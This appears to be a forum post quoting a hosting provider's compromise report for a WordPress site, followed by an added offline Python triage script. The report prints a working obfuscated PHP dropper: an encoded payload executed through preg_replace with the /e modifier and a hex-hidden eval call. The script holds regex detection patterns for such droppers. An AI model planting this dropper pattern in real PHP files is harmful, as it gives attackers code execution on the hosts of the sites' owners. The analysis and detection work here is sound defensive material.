Locaweb (the company that hosts my sites) sent a report of possible "breaches" on the server, but I don't know how to fix this. Here it is:
Evidence:
—————————————————
perl 65411 reporterpilar cwd DIR 253,1 737280 2 /tmp
perl 65411 reporterpilar rtd DIR 253,0 4096 2 /
perl 65411 reporterpilar txt REG 253,0 14168 1800300 /usr/bin/perl
perl 65411 reporterpilar mem REG 253,0 23736 4177941 /lib64/libnss_dns-2.5.so
perl 65411 reporterpilar mem REG 253,0 53880 4178051 /lib64/libnss_files-2.5.so
perl 65411 reporterpilar mem REG 253,0 21424 1926701 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/Socket/Socket.so
perl 65411 reporterpilar mem REG 253,0 18080 1926525 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/IO/IO.so
perl 65411 reporterpilar mem REG 253,0 1720712 4177927 /lib64/libc-2.5.so
perl 65411 reporterpilar mem REG 253,0 146840 4177951 /lib64/libpthread-2.5.so
perl 65411 reporterpilar mem REG 253,0 15280 4178103 /lib64/libutil-2.5.so
bash-3.2$ head wp-trans.php
<?php $payload="3ZTLkoIwEEV/CRIZZQlxDG8HVAR2JLF4gzNgeHz9YGG5Zu0ut27Vud2drt67jYMqfxNd7caArI4CN4k1T6D7hltAmuyTJBCoTjGWe6saUgt4PJz0bQj9kSClO49qwzSvP2Y7Tmp7sGqPU81pCFQeBH/zCMu5nXctg0o3vyGpBh5eV2aAtCPATUyYJC9OHwVGq+PFp5WQWIFRvfSvMRbbvXufOX5LDnJ5w35uIgYj4As6TgWmKV/WKD/o9P1gcxYFKadIasOTXBBgj0fgiLTqE+uyW1Uf0VhvXT3OgNQScChWZjTkKhc66jbvPvBzluriQ6PTkThG2aLNjN6PvWBSWE4M+93H9IMPE4VeQ+vLp+xdP7NKkiU1A6xkaFV9OXtykfizbtYDpEgsCGQzQ06jlRkxFnmElL/b+0/U8rkXL38kJ6WjVbjorKnNc+ugWs1J7bUB+KTbsNy6OHC3/w==";preg_replace('/.*/e',"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29",'.'); ?>
—————————————————
We identified suspicious files/directories:
—————————————————
reporterpilar
-rw-r--r-- 1 reporterpilar reporterpilar 875 Jan 6 18:40 wp-cron.php
-rw-r--r-- 1 reporterpilar reporterpilar 747 Jan 6 18:40 wp-trans.php
-rw-r--r-- 1 reporterpilar reporterpilar 894 Jan 6 18:40 cron.php
public_html
-rw-r--r-- 1 reporterpilar reporterpilar 747 Jan 6 18:41 wp-trans.php
-rw-r--r-- 1 reporterpilar reporterpilar 894 Jan 6 18:41 cron.php
—————————————————
The files listed above are only examples found in a superficial analysis.
It is up to the developer to watch for existing security holes and to identify which files do not belong to the operation of the site, or whether they have been altered/compromised.
The HTTP/FTP logs show accesses that indicate exploitation of vulnerabilities in your application:
—————————————————
91.189.120.17 - - [08/Jan/2018:11:26:24 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36"
91.189.120.17 - - [08/Jan/2018:11:29:09 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36"
91.189.120.17 - - [08/Jan/2018:11:35:58 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36"
91.189.120.17 - - [08/Jan/2018:11:38:55 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36"
91.189.120.17 - - [08/Jan/2018:11:57:09 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36"
91.189.120.17 - - [08/Jan/2018:12:00:50 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36"
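As an added example (not part of the post above or of Locaweb's report), here is an offline triage script in Python for exactly this kind of evidence. It decodes the \xNN-escaped replacement string to show what preg_replace('/.*/e', ...) really runs (with the /e modifier PHP evaluates the replacement as code; the modifier was removed in PHP 7.0, which is why this trick still works on a PHP 5 host), peels the base64 / raw-deflate / base64 layers of a $payload without executing it, flags those indicators in PHP files, and counts POST /wp-login.php per client IP from access-log lines. Only the hex-escaped string is copied from the report; the function names, the stand-in PHP source, the sample webshell text and the log lines are constructed for illustration, and the script is meant to run on a downloaded copy of the site, not on the compromised host.

```python
# Added example (not from the post or from Locaweb): offline triage of the
# report above. Run it against a downloaded copy of the site; nothing here
# executes PHP. Function names, the stand-in PHP, the sample webshell text
# and the log lines are constructed; only HEX_STAGE is copied from the report.
import base64
import re
import sys
import zlib
from collections import Counter
from pathlib import Path

# Replacement argument of preg_replace('/.*/e', ...) in the report's wp-trans.php;
# with the /e modifier PHP evaluates it as code after each match.
HEX_STAGE = (r"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63"
             r"\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62"
             r"\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70"
             r"\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29")

HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")
INDICATORS = {  # plain-text patterns; also re-applied to decoded \xNN runs
    "preg_replace with /e modifier": re.compile(
        r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    "eval(base64_decode(": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "gzinflate(": re.compile(r"gzinflate\s*\("),
    "long \\xNN escape run": HEX_RUN,
}

def decode_hex_escapes(s):
    """Turn a run of \\xNN escapes into the text PHP would evaluate."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s)).decode("latin-1")

def unwrap_payload(payload_b64):
    """Peel $payload exactly as the stage does, but statically: base64 -> inflate -> base64."""
    raw = base64.b64decode(payload_b64)
    inner = zlib.decompress(raw, -15)  # wbits=-15: raw deflate, the format gzinflate() takes
    return base64.b64decode(inner).decode("utf-8", errors="replace")

def wrap_payload(php_source):
    """Inverse of unwrap_payload (what the dropper's author ran); builds the sample below."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    inner = base64.b64encode(php_source.encode())
    return base64.b64encode(comp.compress(inner) + comp.flush()).decode()

def indicators_in(source):
    """Sorted names of the indicators present in one PHP file's text."""
    found = {name for name, rx in INDICATORS.items() if rx.search(source)}
    for m in HEX_RUN.finditer(source):  # eval() hidden behind escapes is still caught
        decoded = decode_hex_escapes(m.group(0))
        found |= {name + " (hex-encoded)" for name, rx in INDICATORS.items() if rx.search(decoded)}
    return sorted(found)

def scan_tree(root):
    """Map each .php file under root that trips an indicator to its indicator list."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        ind = indicators_in(path.read_text(errors="replace"))
        if ind:
            hits[str(path)] = ind
    return hits

LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def login_post_counts(lines):
    """POST /wp-login.php per client IP; a burst from one IP is password guessing."""
    counts = Counter()
    for line in lines:
        m = LOG_RX.match(line)
        if m and m.group(2) == "POST" and m.group(3).startswith("/wp-login.php"):
            counts[m.group(1)] += 1
    return counts

# Constructed sample with the same shape as the report's wp-trans.php, harmless payload.
STAND_IN_PHP = "<?php echo 'stand-in, not the real payload'; ?>"
WEBSHELL_SAMPLE = ('<?php $payload="' + wrap_payload(STAND_IN_PHP) + '";'
                   "preg_replace('/.*/e',\"" + HEX_STAGE + "\",'.'); ?>")
# Constructed log lines in the report's format, using documentation IP ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Jan/2018:11:26:24 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Jan/2018:11:29:09 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Jan/2018:11:30:00 -0200] "GET /wp-login.php HTTP/1.1" 200 2413 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Jan/2018:11:35:58 -0200] "POST /wp-login.php HTTP/1.1" 500 1090 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("stage run by /e:", decode_hex_escapes(HEX_STAGE))
    print("indicators:", indicators_in(WEBSHELL_SAMPLE))
    print("unwrapped:", unwrap_payload(wrap_payload(STAND_IN_PHP)))
    print("wp-login POSTs:", dict(login_post_counts(SAMPLE_LOG)))
    if len(sys.argv) > 1:  # path to a downloaded copy of public_html
        for path, ind in scan_tree(sys.argv[1]).items():
            print(path, "->", ", ".join(ind))
```

Decoding the hex string gives eval(base64_decode(gzinflate(base64_decode($payload),0))), so the file is a three-layer dropper and the real second stage is whatever unwrap_payload() returns for the $payload value in wp-trans.php: treat that output as source to read, never to run. Run the script with the path of a downloaded copy of public_html to get a per-file indicator list. The scan goes by content rather than file name, which matters here: wp-cron.php is a genuine WordPress core file (and considerably larger than 875 bytes), so the copy in the home directory has to be compared against a clean WordPress release rather than judged by its name. Cleaning the PHP files is also not enough on its own, since the lsof lines show a perl process still running with its working directory in /tmp; that process has to be stopped and its script located as well.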